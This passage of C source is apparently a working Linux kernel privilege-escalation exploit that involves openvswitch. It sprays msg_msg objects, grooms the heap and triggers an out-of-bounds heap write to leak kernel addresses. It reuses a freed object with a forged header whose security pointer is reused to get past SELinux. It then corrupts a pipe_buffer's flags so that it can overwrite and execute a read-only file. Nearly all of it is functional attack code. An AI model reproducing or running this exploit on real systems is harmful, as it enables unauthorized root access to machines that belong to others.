        ssize_t copy_size = msgrcv(msqid_1[i], msg_a_oob, MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400), 0, MSG_COPY | IPC_NOWAIT);
        if (copy_size < 0) {
            continue;
        }
        if (copy_size == MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400)) {
            logi("corrupted msg_msg found, id: %d", msqid_1[i]);
            list1_corrupted_msqid = msqid_1[i];
            msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
            uint64_t *oob_data = (uint64_t *)(msg_a_oob->mtext + MSG_A_TEXT_SIZE);
            if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
                logd("but the next object is not allocated by msg_msgseg");
            }
            break;
        }
    }
    if (list1_corrupted_msqid < 0) {
        loge("can't found corrupted msg_msg, and kernel may crash :(");
        clean_msq_1();
        return 1;
    }

    // clean uncorrupted msg_msg
    logd("clean unused msg_msg ...");
    clean_msq_1();

    // realloc 0x400 slab with msg_msg
    logd("alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...");
    for (int i = 0; i < NUM_MSQIDS_2; i++) {
        memset(msg_b->mtext, 'W', MSG_B_TEXT_SIZE);
        ((int *)msg_b->mtext)[0] = MSG_SIG;
        ((int *)msg_b->mtext)[1] = i;
        for (int j = 0; j < 0x10; j++) {
            msg_b->mtype = MTYPE_B | (j << 8);
            if (msgsnd(msqid_2[i], msg_b, MSG_B_TEXT_SIZE, 0) < 0) {
                die("msgsnd() fail");
            }
        }
    }

    // hope leak happen
    {
        ssize_t copy_size = msgrcv(list1_corrupted_msqid, msg_a_oob, MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400), 0, MSG_COPY | IPC_NOWAIT);
        if ((copy_size < 0) || (copy_size != MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400))) {
            die("recv from corrupted msg_msg failed");
        }
        uint64_t *oob_data = (uint64_t *)(msg_a_oob->mtext + MSG_A_TEXT_SIZE);
        struct msg_msg *p = (struct msg_msg *)oob_data;
        if (((int *)&p->mtext)[0] != MSG_SIG) {
            loge("bad luck, we don't catch 0x400 msg_msg");
            clean_msq_2();
            return 1;
        }
        logd("it works :)");

        list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
        list2_leak_mtype = p->m_type;
        list2_leak_security = p->security;
        if (list2_leak_mtype > 0x100) {
            list2_uaf_msg_addr = p->m_list.prev;
            list2_uaf_mtype = p->m_type - 0x0100;
        } else {
            list2_uaf_msg_addr = p->m_list.next;
            list2_uaf_mtype = p->m_type + 0x0100;
        }

        msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        logi("leak list2_leak_msqid: %d", list2_leak_msqid);
        logi("leak list2_leak_mtype: 0x%x", list2_leak_mtype);
        logi("leak list2_uaf_msg_addr: 0x%lx", list2_uaf_msg_addr);
        logi("leak list2_uaf_mtype: 0x%x", list2_uaf_mtype);
    }

    // clean uncorrupted msg_msg
    logd("clean unused msg_msg ...");
    clean_msq_2();

    return 0;
}

int exploit_step2() {
    char buff[0x1000];

    logd("do heap fengshui to reduce noise ...");
    pagealloc_pad(1000, 0x1000);
    pagealloc_pad(500, 0x2000);
    pagealloc_pad(200, 0x4000);
    pagealloc_pad(200, 0x8000);
    pagealloc_pad(100, 0x10000);
    int fengshui_skfd[fengshui_skfd_cnt];
    for (int i = 0; i < fengshui_skfd_cnt; i++) {
        fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
    }
    for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
        close(fengshui_skfd[i]);
        fengshui_skfd[i] = -1;
    }

    // alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
    logd("sparying msg_msg ...");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        msg_a->mtype = MTYPE_A;
        memset(msg_a->mtext, 'Q', MSG_A_TEXT_SIZE);
        ((int *)msg_a->mtext)[0] = MSG_SIG;
        ((int *)msg_a->mtext)[1] = i;
        if (msgsnd(msqid_1[i], msg_a, MSG_A_TEXT_SIZE, 0) < 0) {
            die("msgsnd() fail");
        }
    }

    logd("free other rx_ring buffer ... ");
    for (int i = 0; i < fengshui_skfd_cnt; i += 1) {
        if (fengshui_skfd[i] > 0) {
            close(fengshui_skfd[i]);
            fengshui_skfd[i] = -1;
        }
    }

    logd("trigger vuln to do heap oob write ...");
    uint64_t vuln_buf[] = {
        list2_uaf_msg_addr, // m_list.next
    };
    trigger_vuln(&vuln_buf, sizeof(vuln_buf));

    // free uaf msg_msg
    logd("free uaf msg_msg from correct msqid");
    if (msgrcv(list2_leak_msqid, msg_b, MSG_B_TEXT_SIZE, list2_uaf_mtype, 0) < 0) {
        die("msgrcv() fail");
    }

    // spary skbuff_data to re-acquire uaf msg_msg and fake the header
    logd("spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg");
    {
        memset(buff, 0, sizeof(buff));
        struct msg_msg *p = (struct msg_msg *)buff;
        p->m_list.next = list2_uaf_msg_addr;
        p->m_list.prev = list2_uaf_msg_addr;
        p->m_ts = 0x100;
        p->m_type = MTYPE_FAKE;
        p->next = 0;
        p->security = list2_leak_security; // bypass selinux
        spray_skbuff_data(buff, 0x400 - 0x140);
    }

    // free uaf msg_msg
    logd("free skbuff_data using fake msqid");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        if (msgrcv(msqid_1[i], msg_b, MSG_B_TEXT_SIZE, MTYPE_FAKE, IPC_NOWAIT) > 0) {
            logd("freed using msqid %d", i);
            break;
        }
    }

    // filled with pipe_buffer
    logd("spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data");
    int attack_fd = open(ATTACK_FILE, O_RDONLY);
    if (attack_fd < 0) {
        die("open %s: %m", ATTACK_FILE);
    }
    for (int i = 0; i < NUM_PIPES; i++) {
        if (pipe(pipes[i])) {
            die("alloc pipe failed");
        }

        write(pipes[i][1], buff, 0x100 + i);

        loff_t offset = 1;
        ssize_t nbytes = splice(attack_fd, &offset, pipes[i][1], NULL, 1, 0);
        if (nbytes < 0) {
            die("splice() failed");
        }
    }

    logd("free skbuff_data to make pipe_buffer become UAF");
    int uaf_pipe_idx = -1;
    char pipe_buffer_backup[0x280];
    int PIPE_BUF_FLAG_CAN_MERGE = 0x10;
    {
        struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
        uint64_t size = 0x400 - 0x140;
        for (int i = 0; i < NUM_SOCKETS; i++) {
            for (int j = 0; j < NUM_SKBUFFS; j++) {
                if (read(sock_pairs[i][1], ptr, size) < 0) {
                    die("read from sock pairs failed");
                }
                if (ptr[1].len == 1 && ptr[1].offset == 1) {
                    // find pipe_buffer
                    memcpy(pipe_buffer_backup, ptr, sizeof(pipe_buffer_backup));
                    uaf_pipe_idx = ptr[0].len & 0xff;
                    logi("uaf_pipe_idx: %d", uaf_pipe_idx);
                    goto out1;
                }
            }
        }
    }
out1:
    if (uaf_pipe_idx < 0) {
        die("can't find corrupted pipe_buffer");
    }

    logd("edit pipe_buffer->flags");
    {
        memset(buff, 0, sizeof(buff));
        memcpy(buff, pipe_buffer_backup, sizeof(pipe_buffer_backup));
        struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
        ptr[1].flags = PIPE_BUF_FLAG_CAN_MERGE; // for kernel >= 5.8
        ptr[1].len = 0;
        ptr[1].offset = 0;
        ptr[1].ops = ptr[0].ops; // for kernel < 5.8
        spray_skbuff_data(buff, 0x400 - 0x140);
    }

    logd("try to overwrite %s", ATTACK_FILE);
    {
        ssize_t nbytes = write(pipes[uaf_pipe_idx][1], attack_data, sizeof(attack_data));
        if (nbytes < 0) {
            die("write failed");
        }
        if ((size_t)nbytes < sizeof(attack_data)) {
            die("short write");
        }
    }

    logd("see if %s changed", ATTACK_FILE);
    {
        int fd = open(ATTACK_FILE, O_RDONLY);
        if (fd < 0) {
            die("open attack file");
        }
        char tmp_buffer[0x10];
        read(fd, tmp_buffer, 0x10);
        uint32_t *ptr = (uint32_t *)(tmp_buffer + 9);
        if (ptr[0] != 0x56565656) {
            die("overwrite attack file failed: 0x%08x", ptr[0]);
        }
    }

    logi("exploit success");

    // clean
    close(pipes[uaf_pipe_idx][0]);
    close(pipes[uaf_pipe_idx][1]);
    for (int i = 0; i < NUM_MSQIDS_2; i++) {
        memset(msg_b->mtext, 0, MSG_B_TEXT_SIZE);
        msg_b->mtype = MTYPE_B;
        if (msgsnd(msqid_2[i], msg_b, MSG_B_TEXT_SIZE, 0) < 0) {
            die("msgsnd() fail");
        }
    }

    return 0;
}

int main(int argc, char **argv) {
    pipe(sync_pipe);

    if (!fork()) {
        logd("initialize exploit environment ...");
        do_init();

        logd("create br to check if openvswitch works ...");
        create_br1337();

        logd("do exploit step 1 ...");
        while (exploit_step1()) {
            logw("retry ...");
        }

        logd("do exploit step 2 ...");
        while (exploit_step2()) {
            logw("retry ...");
        }

        logd("maybe unsafe to exit, sleep infinitely ...");
        write(sync_pipe[1], "T", 1);
        while (1) {
            sleep(10);
        }
    } else {
        char sync;
        read(sync_pipe[0], &sync, 1);
        if (sync == 'T') {
            execl(ATTACK_FILE, ATTACK_FILE, NULL);
        }
    }
    return 0;
}